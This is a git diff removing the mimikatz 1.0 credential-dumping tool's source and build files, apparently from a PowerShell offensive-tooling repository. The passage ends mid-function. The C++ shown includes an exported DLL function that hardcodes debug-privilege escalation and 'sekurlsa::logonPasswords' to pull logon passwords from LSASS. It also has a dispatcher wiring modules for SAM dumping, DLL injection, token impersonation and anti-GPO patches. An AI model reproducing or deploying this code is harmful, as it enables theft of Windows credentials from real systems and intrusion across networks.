<UniqueIdentifier>{1e52fbf9-a352-419f-870b-3c4e265781d8}</UniqueIdentifier> - <Extensions> - </Extensions> - </Filter> - <Filter Include="Modules Communs\System"> - <UniqueIdentifier>{7fcd7c52-b4e5-4c6c-9dc7-190fbe667193}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Texte"> - <UniqueIdentifier>{c175e3ec-41d0-4474-bbc7-eb1962a7fc70}</UniqueIdentifier> - </Filter> - <Filter Include="Modules locaux pour sekurlsa"> - <UniqueIdentifier>{b3819528-2e60-46a3-b37a-7c575a4d866a}</UniqueIdentifier> - </Filter> - </ItemGroup> - <ItemGroup> - <ClCompile Include="..\..\modules\mod_pipe.cpp"> - <Filter>Modules Communs\Communication</Filter> - </ClCompile> - <ClCompile Include="..\..\modules\mod_parseur.cpp"> - <Filter>Modules Communs\Parseur</Filter> - </ClCompile> - <ClCompile Include="..\..\commun\kmodel.cpp"> - <Filter>Modules Communs\Librairie Modèle</Filter> - </ClCompile> - <ClCompile Include="..\..\modules\mod_memory.cpp"> - <Filter>Modules Communs\Mémoire</Filter> - </ClCompile> - <ClCompile Include="sekurlsa.cpp" /> - <ClCompile Include="..\..\modules\mod_system.cpp"> - <Filter>Modules Communs\System</Filter> - </ClCompile> - <ClCompile Include="Security Packages\msv1_0.cpp"> - <Filter>Security Packages</Filter> - </ClCompile> - <ClCompile Include="Security Packages\msv1_0_helper.cpp"> - <Filter>Security Packages</Filter> - </ClCompile> - <ClCompile Include="..\..\modules\mod_text.cpp"> - <Filter>Modules Communs\Texte</Filter> - </ClCompile> - <ClCompile Include="..\..\modules\mod_process.cpp"> - <Filter>Modules Communs\System</Filter> - </ClCompile> - <ClCompile Include="modules\incognito.cpp"> - <Filter>Modules locaux pour sekurlsa</Filter> - </ClCompile> - <ClCompile Include="modules\secrets.cpp"> - <Filter>Modules locaux pour sekurlsa</Filter> - </ClCompile> - <ClCompile Include="modules\credman.cpp"> - <Filter>Modules locaux pour sekurlsa</Filter> - </ClCompile> - <ClCompile Include="modules\sam.cpp"> - <Filter>Modules locaux pour sekurlsa</Filter> - </ClCompile> - </ItemGroup> - <ItemGroup> - <ClInclude Include="..\..\modules\mod_pipe.h"> - <Filter>Modules Communs\Communication</Filter> - </ClInclude> - <ClInclude Include="..\..\modules\mod_parseur.h"> - <Filter>Modules Communs\Parseur</Filter> - </ClInclude> - <ClInclude Include="..\..\commun\kmodel.h"> - <Filter>Modules Communs\Librairie Modèle</Filter> - </ClInclude> - <ClInclude Include="..\..\modules\mod_memory.h"> - <Filter>Modules Communs\Mémoire</Filter> - </ClInclude> - <ClInclude Include="sekurlsa.h" /> - <ClInclude Include="..\..\modules\mod_system.h"> - <Filter>Modules Communs\System</Filter> - </ClInclude> - <ClInclude Include="Security Packages\msv1_0.h"> - <Filter>Security Packages</Filter> - </ClInclude> - <ClInclude Include="Security Packages\msv1_0_helper.h"> - <Filter>Security Packages</Filter> - </ClInclude> - <ClInclude Include="..\..\modules\mod_text.h"> - <Filter>Modules Communs\Texte</Filter> - </ClInclude> - <ClInclude Include="..\..\commun\secpkg.h" /> - <ClInclude Include="..\..\modules\mod_process.h"> - <Filter>Modules Communs\System</Filter> - </ClInclude> - <ClInclude Include="modules\incognito.h"> - <Filter>Modules locaux pour sekurlsa</Filter> - </ClInclude> - <ClInclude Include="modules\credman.h"> - <Filter>Modules locaux pour sekurlsa</Filter> - </ClInclude> - <ClInclude Include="modules\secrets.h"> - <Filter>Modules locaux pour sekurlsa</Filter> - </ClInclude> - <ClInclude Include="modules\sam.h"> - <Filter>Modules locaux pour sekurlsa</Filter> - </ClInclude> - </ItemGroup> - <ItemGroup> - <ResourceCompile Include="sekurlsa.rc" /> - </ItemGroup> -</Project>
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/lisezmoi.txt b/Exfiltration/mimikatz-1.0/lisezmoi.txt deleted file mode 100644 index eed6a50..0000000 --- a/Exfiltration/mimikatz-1.0/lisezmoi.txt +++ /dev/null @@ -1,47 +0,0 @@ -mimikatz -======== - - -Cette archive ne contient que les binaires pour les architectures x86 (Win32) et x64. Des extraits de diffrents codes source sont disponibles : http://blog.gentilkiwi.com/mimikatz -Cet utilitaire ne peut tre utilis qu' des fins d'tudes, pentests et autres actions lgales en accord avec la licence prcise ci-dessous. - -Plus globalement, merci de respecter la philosophie avec laquelle cet outil a t cr, c'est dire en ne permettant pas son utilisation des fins malveillantes. -Je ne serais en aucun cas responsable de l'utilisation qui serait faite de ces technologies. - -Binaires, codes source, drivs et utilisations sous Licence : http://creativecommons.org/licenses/by/3.0/fr/ -Exception pour la librairie sekurlsa : http://creativecommons.org/licenses/by/3.0/fr/ -_____________________________________________________ -Benjamin DELPY `gentilkiwi` -http://blog.gentilkiwi.com/mimikatz -benjamin@gentilkiwi.com - - -anti-gpo standalone -=================== - -Ces outils ont ts remplac par l'utilisation directe de mimikatz - -* KiwiRegedit - mimikatz nogpo::regedit exit - -* KiwiCmd - mimikatz nogpo::cmd exit - -* KiwiRegedit - mimikatz nogpo::taskmgr exit - - -outils incorpors -================= - -* psexec.exe - PsExec v1.98 - Execute processes remotely - Mark Russinovich (Sysinternals / Microsoft) - -* tee.exe - GNU shellutils 1.9.4 - http://unxutils.sourceforge.net/ - -* winmine.exe - Dmineur de Windows XP - Robert Donner et Curt Johnson (Microsoft)
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz.sln b/Exfiltration/mimikatz-1.0/mimikatz.sln deleted file mode 100644 index aa46f44..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz.sln +++ /dev/null @@ -1,85 +0,0 @@ - -Microsoft Visual Studio Solution File, Format Version 11.00 -# Visual Studio 2010 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mimikatz", "mimikatz\mimikatz.vcxproj", "{2A7BA573-8751-4BC2-A8A2-EDD62F7A8AB8}" -EndProject -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "kelloworld", "librairies\kelloworld\kelloworld.vcxproj", "{D0ABA26B-0C4F-41F0-8F3C-7F5EFE3C50C6}" -EndProject -Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "librairies", "librairies", "{B17EB705-1C68-44FD-A82B-860C539219A8}" -EndProject -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sekurlsa", "librairies\sekurlsa\sekurlsa.vcxproj", "{3A436EFD-4FD7-4E5F-B0EC-F9DCCACF1E60}" -EndProject -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "klock", "librairies\klock\klock.vcxproj", "{6556249E-1C80-4047-A863-F608C8B8AC55}" -EndProject -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "kappfree", "kappfree\kappfree.vcxproj", "{E7A85049-E31E-4575-B6A0-E6F1EAA9EEB0}" -EndProject -Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{7999D050-6332-45F7-A343-C343902B1453}" - ProjectSection(SolutionItems) = preProject - lisezmoi.txt = lisezmoi.txt - EndProjectSection -EndProject -Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "En-têtes", "En-têtes", "{24371643-CEFE-4590-BB29-6141CB5E25D1}" - ProjectSection(SolutionItems) = preProject - commun\globdefs.h = commun\globdefs.h - commun\secpkg.h = commun\secpkg.h - EndProjectSection -EndProject -Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Icons", "Icons", "{80532836-DE52-40AD-B373-E4098BF52E1F}" - ProjectSection(SolutionItems) = preProject - commun\icons\cmd_32.ico = commun\icons\cmd_32.ico - commun\icons\cmd_48.ico = commun\icons\cmd_48.ico - commun\icons\cmd_kiwi.ico = commun\icons\cmd_kiwi.ico - commun\icons\mimikatz_bird.ico = commun\icons\mimikatz_bird.ico - commun\icons\mimikatz_fruit.ico = commun\icons\mimikatz_fruit.ico - commun\icons\mimikatz_fruit_16.ico = commun\icons\mimikatz_fruit_16.ico - commun\icons\regedit_32.ico = commun\icons\regedit_32.ico - commun\icons\regedit_48.ico = commun\icons\regedit_48.ico - commun\icons\regedit_kiwi.ico = commun\icons\regedit_kiwi.ico - commun\icons\taskmgr_32.ico = commun\icons\taskmgr_32.ico - commun\icons\taskmgr_48.ico = commun\icons\taskmgr_48.ico - commun\icons\taskmgr_kiwi.ico = commun\icons\taskmgr_kiwi.ico - EndProjectSection -EndProject -Global - GlobalSection(SubversionScc) = preSolution - Svn-Managed = True - Manager = AnkhSVN - Subversion Support for Visual Studio - EndGlobalSection - GlobalSection(SolutionConfigurationPlatforms) = preSolution - Release|Win32 = Release|Win32 - Release|x64 = Release|x64 - EndGlobalSection - GlobalSection(ProjectConfigurationPlatforms) = postSolution - {2A7BA573-8751-4BC2-A8A2-EDD62F7A8AB8}.Release|Win32.ActiveCfg = Release|Win32 - {2A7BA573-8751-4BC2-A8A2-EDD62F7A8AB8}.Release|Win32.Build.0 = Release|Win32 - {2A7BA573-8751-4BC2-A8A2-EDD62F7A8AB8}.Release|x64.ActiveCfg = Release|x64 - {2A7BA573-8751-4BC2-A8A2-EDD62F7A8AB8}.Release|x64.Build.0 = Release|x64 - {D0ABA26B-0C4F-41F0-8F3C-7F5EFE3C50C6}.Release|Win32.ActiveCfg = Release|Win32 - {D0ABA26B-0C4F-41F0-8F3C-7F5EFE3C50C6}.Release|Win32.Build.0 = Release|Win32 - {D0ABA26B-0C4F-41F0-8F3C-7F5EFE3C50C6}.Release|x64.ActiveCfg = Release|x64 - {D0ABA26B-0C4F-41F0-8F3C-7F5EFE3C50C6}.Release|x64.Build.0 = Release|x64 - {3A436EFD-4FD7-4E5F-B0EC-F9DCCACF1E60}.Release|Win32.ActiveCfg = Release|Win32 - {3A436EFD-4FD7-4E5F-B0EC-F9DCCACF1E60}.Release|Win32.Build.0 = Release|Win32 - {3A436EFD-4FD7-4E5F-B0EC-F9DCCACF1E60}.Release|x64.ActiveCfg = Release|x64 - {3A436EFD-4FD7-4E5F-B0EC-F9DCCACF1E60}.Release|x64.Build.0 = Release|x64 - {6556249E-1C80-4047-A863-F608C8B8AC55}.Release|Win32.ActiveCfg = Release|Win32 - {6556249E-1C80-4047-A863-F608C8B8AC55}.Release|Win32.Build.0 = Release|Win32 - {6556249E-1C80-4047-A863-F608C8B8AC55}.Release|x64.ActiveCfg = Release|x64 - {6556249E-1C80-4047-A863-F608C8B8AC55}.Release|x64.Build.0 = Release|x64 - {E7A85049-E31E-4575-B6A0-E6F1EAA9EEB0}.Release|Win32.ActiveCfg = Release|Win32 - {E7A85049-E31E-4575-B6A0-E6F1EAA9EEB0}.Release|Win32.Build.0 = Release|Win32 - {E7A85049-E31E-4575-B6A0-E6F1EAA9EEB0}.Release|x64.ActiveCfg = Release|x64 - {E7A85049-E31E-4575-B6A0-E6F1EAA9EEB0}.Release|x64.Build.0 = Release|x64 - EndGlobalSection - GlobalSection(SolutionProperties) = preSolution - HideSolutionNode = FALSE - EndGlobalSection - GlobalSection(NestedProjects) = preSolution - {D0ABA26B-0C4F-41F0-8F3C-7F5EFE3C50C6} = {B17EB705-1C68-44FD-A82B-860C539219A8} - {3A436EFD-4FD7-4E5F-B0EC-F9DCCACF1E60} = {B17EB705-1C68-44FD-A82B-860C539219A8} - {6556249E-1C80-4047-A863-F608C8B8AC55} = {B17EB705-1C68-44FD-A82B-860C539219A8} - {E7A85049-E31E-4575-B6A0-E6F1EAA9EEB0} = {B17EB705-1C68-44FD-A82B-860C539219A8} - {24371643-CEFE-4590-BB29-6141CB5E25D1} = {7999D050-6332-45F7-A343-C343902B1453} - {80532836-DE52-40AD-B373-E4098BF52E1F} = {7999D050-6332-45F7-A343-C343902B1453} - EndGlobalSection -EndGlobal diff --git a/Exfiltration/mimikatz-1.0/mimikatz/Win32/CL.read.1.tlog b/Exfiltration/mimikatz-1.0/mimikatz/Win32/CL.read.1.tlog Binary files differdeleted file mode 100644 index ce3b7c5..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/Win32/CL.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/mimikatz/Win32/CL.write.1.tlog b/Exfiltration/mimikatz-1.0/mimikatz/Win32/CL.write.1.tlog Binary files differdeleted file mode 100644 index 5b567c0..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/Win32/CL.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/mimikatz/Win32/cl.command.1.tlog b/Exfiltration/mimikatz-1.0/mimikatz/Win32/cl.command.1.tlog Binary files differdeleted file mode 100644 index f911a97..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/Win32/cl.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/mimikatz/Win32/link-cvtres.read.1.tlog b/Exfiltration/mimikatz-1.0/mimikatz/Win32/link-cvtres.read.1.tlog deleted file mode 100644 index 46b134b..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/Win32/link-cvtres.read.1.tlog +++ /dev/null @@ -1 +0,0 @@ -
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/Win32/link-cvtres.write.1.tlog b/Exfiltration/mimikatz-1.0/mimikatz/Win32/link-cvtres.write.1.tlog deleted file mode 100644 index 46b134b..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/Win32/link-cvtres.write.1.tlog +++ /dev/null @@ -1 +0,0 @@ -
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/Win32/link.command.1.tlog b/Exfiltration/mimikatz-1.0/mimikatz/Win32/link.command.1.tlog Binary files differdeleted file mode 100644 index 88decc7..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/Win32/link.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/mimikatz/Win32/link.read.1.tlog b/Exfiltration/mimikatz-1.0/mimikatz/Win32/link.read.1.tlog Binary files differdeleted file mode 100644 index 8e0945c..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/Win32/link.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/mimikatz/Win32/link.write.1.tlog b/Exfiltration/mimikatz-1.0/mimikatz/Win32/link.write.1.tlog Binary files differdeleted file mode 100644 index 4395a0c..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/Win32/link.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/mimikatz/Win32/mimikatz.lastbuildstate b/Exfiltration/mimikatz-1.0/mimikatz/Win32/mimikatz.lastbuildstate deleted file mode 100644 index 4d28193..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/Win32/mimikatz.lastbuildstate +++ /dev/null @@ -1,2 +0,0 @@ -#v4.0:v100 -Release|Win32|C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\| diff --git a/Exfiltration/mimikatz-1.0/mimikatz/Win32/mimikatz.res b/Exfiltration/mimikatz-1.0/mimikatz/Win32/mimikatz.res Binary files differdeleted file mode 100644 index ab3f94d..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/Win32/mimikatz.res +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/mimikatz/Win32/mimikatz.write.1.tlog b/Exfiltration/mimikatz-1.0/mimikatz/Win32/mimikatz.write.1.tlog deleted file mode 100644 index ee7a2bc..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/Win32/mimikatz.write.1.tlog +++ /dev/null @@ -1,5 +0,0 @@ -^C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\mimikatz\mimikatz.vcxproj -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\mimikatz.lib -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\mimikatz.lib -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\mimikatz.exp -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\mimikatz.exp diff --git a/Exfiltration/mimikatz-1.0/mimikatz/Win32/rc.command.1.tlog b/Exfiltration/mimikatz-1.0/mimikatz/Win32/rc.command.1.tlog Binary files differdeleted file mode 100644 index 7de5294..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/Win32/rc.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/mimikatz/Win32/rc.read.1.tlog b/Exfiltration/mimikatz-1.0/mimikatz/Win32/rc.read.1.tlog Binary files differdeleted file mode 100644 index a9809e1..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/Win32/rc.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/mimikatz/Win32/rc.write.1.tlog b/Exfiltration/mimikatz-1.0/mimikatz/Win32/rc.write.1.tlog Binary files differdeleted file mode 100644 index 5913372..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/Win32/rc.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/mimikatz/global.cpp b/Exfiltration/mimikatz-1.0/mimikatz/global.cpp deleted file mode 100644 index 365bd1a..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/global.cpp +++ /dev/null @@ -1,5 +0,0 @@ -#include <ostream> -#include <iostream> -#include "global.h" - -std::wostream *outputStream = &std::wcout;
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/global.h b/Exfiltration/mimikatz-1.0/mimikatz/global.h deleted file mode 100644 index 4bfe000..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/global.h +++ /dev/null @@ -1,4 +0,0 @@ -#pragma once -#include <ostream> - -extern std::wostream *outputStream;
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/main.cpp b/Exfiltration/mimikatz-1.0/mimikatz/main.cpp deleted file mode 100644 index 8862e42..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/main.cpp +++ /dev/null @@ -1,73 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Modifications in this file made by: Joe Bialek. Twitter: @JosephBialek. - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "globdefs.h" -#include <io.h> -#include <fcntl.h> -#include "mimikatz.h" -#include <ShellAPI.h> - -int wmain(int argc, wchar_t * argv[]) -{ - setlocale(LC_ALL, "French_France.65001"); - _setmode(_fileno(stdin), _O_U8TEXT/*_O_WTEXT/*_O_U16TEXT*/); - _setmode(_fileno(stdout), _O_U8TEXT/*_O_WTEXT/*_O_U16TEXT*/); - _setmode(_fileno(stderr), _O_U8TEXT/*_O_WTEXT/*_O_U16TEXT*/); - - /*SetConsoleCP(CP_UTF8); - SetConsoleOutputCP(CP_UTF8);*/ - - vector<wstring> * mesArguments = new vector<wstring>(argv + 1, argv + argc); - - mimikatz * myMimiKatz = new mimikatz(mesArguments); - delete myMimiKatz, mesArguments; - return ERROR_SUCCESS; -} - -extern "C" __declspec ( dllexport) wchar_t* WStringFunc() -{ - wostringstream *stringStream = new wostringstream(); - outputStream = stringStream; - - vector<wstring>* mesArguments = new vector<wstring>(); - (*mesArguments).push_back(L"privilege::debug"); - (*mesArguments).push_back(L"sekurlsa::logonPasswords"); - (*mesArguments).push_back(L"exit"); - - mimikatz* myMimikatz = new mimikatz(mesArguments); - delete myMimikatz, mesArguments; - - wstring output = (*stringStream).str(); - const wchar_t* outputStr = output.c_str(); - wchar_t* out = new wchar_t[output.size() + 1]; - wcscpy(out, outputStr); - out[output.size()] = '\0'; - - return out; -} - -extern "C" __declspec ( dllexport) wchar_t* PSMimikatz(LPCWSTR input) -{ - wostringstream *stringStream = new wostringstream(); - outputStream = stringStream; - - int argc = 0; - LPWSTR* argv = CommandLineToArgvW(input, &argc); - - vector<wstring> * mesArguments = new vector<wstring>(argv, argv + argc); - - mimikatz* myMimikatz = new mimikatz(mesArguments); - delete myMimikatz, mesArguments; - - wstring output = (*stringStream).str(); - const wchar_t* outputStr = output.c_str(); - wchar_t* out = new wchar_t[output.size() + 1]; - wcscpy(out, outputStr); - out[output.size()] = '\0'; - - return out; -} - diff --git a/Exfiltration/mimikatz-1.0/mimikatz/mimikatz.cpp b/Exfiltration/mimikatz-1.0/mimikatz/mimikatz.cpp deleted file mode 100644 index 7265ef9..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/mimikatz.cpp +++ /dev/null @@ -1,286 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mimikatz.h" - -bool mimikatz::initLocalModules() -{ - mod_system::getVersion(&mod_system::GLOB_Version); - mod_mimikatz_sekurlsa::loadLsaSrv(); - mod_cryptoapi::loadRsaEnh(); - - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"", L"Standard", mod_mimikatz_standard::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"crypto", L"Cryptographie et certificats", mod_mimikatz_crypto::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"hash", L"Hash", mod_mimikatz_hash::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"system", L"Gestion systme", mod_mimikatz_system::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"process", L"Manipulation des processus", mod_mimikatz_process::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"thread", L"Manipulation des threads", mod_mimikatz_thread::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"service", L"Manipulation des services", mod_mimikatz_service::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"privilege", L"Manipulation des privilges", mod_mimikatz_privilege::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"handle", L"Manipulation des handles", mod_mimikatz_handle::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"impersonate", L"Manipulation tokens d\'accs", mod_mimikatz_impersonate::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"winmine", L"Manipulation du dmineur", mod_mimikatz_winmine::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"minesweeper", L"Manipulation du dmineur 7", mod_mimikatz_minesweeper::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"nogpo", L"Anti-gpo et patchs divers", mod_mimikatz_nogpo::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"samdump", L"Dump de SAM", mod_mimikatz_samdump::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"inject", L"Injecteur de librairies", mod_mimikatz_inject::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"ts", L"Terminal Server", mod_mimikatz_terminalserver::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"divers", L"Fonctions diverses n\'ayant pas encore assez de corps pour avoir leurs propres module", mod_mimikatz_divers::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"sekurlsa", L"Dump des sessions courantes par providers LSASS", mod_mimikatz_sekurlsa::getMimiKatzCommands())); - mesModules.push_back(KIWI_MIMIKATZ_LOCAL_MODULE(L"efs", L"Manipulations EFS", mod_mimikatz_efs::getMimiKatzCommands())); - return true; -} - -mimikatz::mimikatz(vector<wstring> * mesArguments) : Kmimikatz(NULL) -{ - initLocalModules(); - SetConsoleTitle(MIMIKATZ_FULL); - (*outputStream) << MIMIKATZ_FULL << L"\t/* Traitement du Kiwi (" << __DATE__ << L' ' << __TIME__ << L") */" << endl << - L"// http://blog.gentilkiwi.com/mimikatz" << endl; - - bool mustContinue = true; - if(mesArguments) - { - for(vector<wstring>::iterator maCommande = mesArguments->begin(); mustContinue && (maCommande != mesArguments->end()); maCommande++) - { - wstring commande = *maCommande; - (*outputStream) << endl << MIMIKATZ << L"(commandline) # " << dec << commande << endl; - mustContinue = tryToDispatch(&commande); - } - } - - if(mustContinue) - { - wstring * monBuffer = new wstring(); - do - { - (*outputStream) << endl << MIMIKATZ << L" # " << dec; - getline(wcin, *monBuffer); - } while(tryToDispatch(monBuffer)); - delete monBuffer; - } - wcout.flush(); -} - -mimikatz::~mimikatz(void) -{ - mod_cryptoapi::unloadRsaEnh(); - mod_mimikatz_sekurlsa::unloadLsaSrv(); - mod_mimikatz_inject::closeThisCommunicator(); -} - -bool mimikatz::tryToDispatch(wstring * maLigne) -{ - bool reussite = false; - - if(!(reussite = maLigne->empty())) - { - switch(*(maLigne->begin())) - { - case L'@': - case L'*': - reussite = this->doCommandeDistante(maLigne->substr(1)); - break; - case L'!': - reussite = this->doCommandeKernel(maLigne->substr(1)); - break; - default: - wstring fonction = *maLigne; - vector<wstring> arguments; - - size_t monIndex = fonction.find(L' '); - if(monIndex != wstring::npos) - { - fonction = fonction.substr(0, monIndex); - arguments = mod_parseur::parse(maLigne->substr(monIndex + 1)); - } - reussite = doCommandeLocale(&fonction, &arguments); - } - } - - return reussite; -} - -bool mimikatz::doCommandeLocale(wstring * fonction, vector<wstring> * arguments) -{ - size_t monIndex = fonction->find(L"::"); - - wstring module = L""; - wstring commande = *fonction; - - if(monIndex != wstring::npos) - { - module = fonction->substr(0, monIndex); - commande = fonction->substr(monIndex + 2); - } - - for(vector<KIWI_MIMIKATZ_LOCAL_MODULE>::iterator monModule = mesModules.begin(); monModule != mesModules.end(); monModule++) - { - if(module == monModule->module) - { - for(vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND>::iterator maCommande = monModule->commandes.begin(); maCommande != monModule->commandes.end(); maCommande++) - { - if(commande == maCommande->commandName) - { - return maCommande->ptrCommand(arguments); - } - } - - if(module.empty()) (*outputStream) << L"Commande locale \'" << commande << L"\' introuvable" << endl; - else (*outputStream) << L"Module : \'" << module << L"\' identifi, mais commande \'" << commande << L"\' introuvable" << endl; - - (*outputStream) << endl << L"Description du module : " << monModule->description << endl; - listCommandes(monModule); - - return true; - } - } - - (*outputStream) << L"Module : \'" << module << L"\' introuvable" << endl << endl << L"Modules disponibles : " << endl; - listModules(); - return true; -} - -bool mimikatz::openKernel() -{ - bool reussite = false; - - if(!Kmimikatz || Kmimikatz == INVALID_HANDLE_VALUE) - { - (*outputStream) << L"Ouverture du pilote mimikatz : "; - Kmimikatz = CreateFile(L"\\\\.\\mimikatz", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); - - if(reussite = (Kmimikatz && Kmimikatz != INVALID_HANDLE_VALUE)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"CreateFile ; " << mod_system::getWinError(); - (*outputStream) << endl; - } - else - { - reussite = true; - } - - return reussite; -} - -bool mimikatz::closeKernel() -{ - bool reussite = false; - if(Kmimikatz && Kmimikatz != INVALID_HANDLE_VALUE) - { - if(CloseHandle(Kmimikatz)) - { - Kmimikatz = NULL; - reussite = true; - } - } - return reussite; -} - -bool mimikatz::doCommandeKernel(std::wstring &commande) -{ - if(!commande.empty()) - { - if(openKernel()) - { - DWORD dwReturn; - /* - (*outputStream) << L"DEBUG WriteFile " << endl << - L"\tToWrite : " << (commande.size() + 1) * sizeof(wchar_t) << endl; - */ - if(WriteFile(Kmimikatz, commande.c_str(), (commande.size() + 1) * sizeof(wchar_t), &dwReturn, NULL)) - { - /*(*outputStream) << L"\tWriten : " << dwReturn << endl << endl;*/ - - DWORD dwBuff = 0x40000; - DWORD dwRead = 0; - BYTE * buffer = new BYTE[dwBuff]; - RtlZeroMemory(buffer, dwBuff); - - /*(*outputStream) << L"DEBUG ReadFile " << endl << - L"\tBuffSize : " << dwBuff << endl;*/ - - if(ReadFile(Kmimikatz, buffer, dwBuff, &dwRead, NULL)) - { - /*(*outputStream) << - L"\tReaded : " << dwRead << endl << - endl; - */ - wcout /*<< L"BUFF : " << endl*/ - << reinterpret_cast<wchar_t *>(buffer) << endl; - } - else (*outputStream) << L"ReadFile : " << mod_system::getWinError() << endl; - - delete[] buffer; - } - else (*outputStream) << L"WriteFile : " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"Impossible de communiquer avec le pilote mimikatz"; - } - else - { - (*outputStream) << L"Commande vide (fermeture force) reue" << endl; - closeKernel(); - } - - return true; -} - -bool mimikatz::doCommandeDistante(std::wstring &commande) -{ - bool commOk = false; - - if(mod_mimikatz_inject::monCommunicator) - { - if(!commande.empty()) - { - if(mod_mimikatz_inject::monCommunicator->isConnected()) - { - if(mod_mimikatz_inject::monCommunicator->writeToPipe(commande)) - { - wstring buffer = L""; - do - { - if(commOk = mod_mimikatz_inject::monCommunicator->readFromPipe(buffer)) - { - (*outputStream) << buffer.substr(1) ; - } - else - { - (*outputStream) << L"Erreur : pas de rponse possible ; " << mod_system::getWinError() << endl; - break; - } - } while(*(buffer.begin()) == L'#'); - } - else (*outputStream) << L"Erreur : pas d\'criture possible ; " << mod_system::getWinError() << endl; - } - } - else (*outputStream) << L"Commande vide (dconnexion force) reue" << endl; - } - else (*outputStream) << L"Erreur : pas ou plus de communication tablie" << endl; - - if(!commOk) - mod_mimikatz_inject::closeThisCommunicator(); - - return true; -} - -void mimikatz::listModules() -{ - for(vector<KIWI_MIMIKATZ_LOCAL_MODULE>::iterator 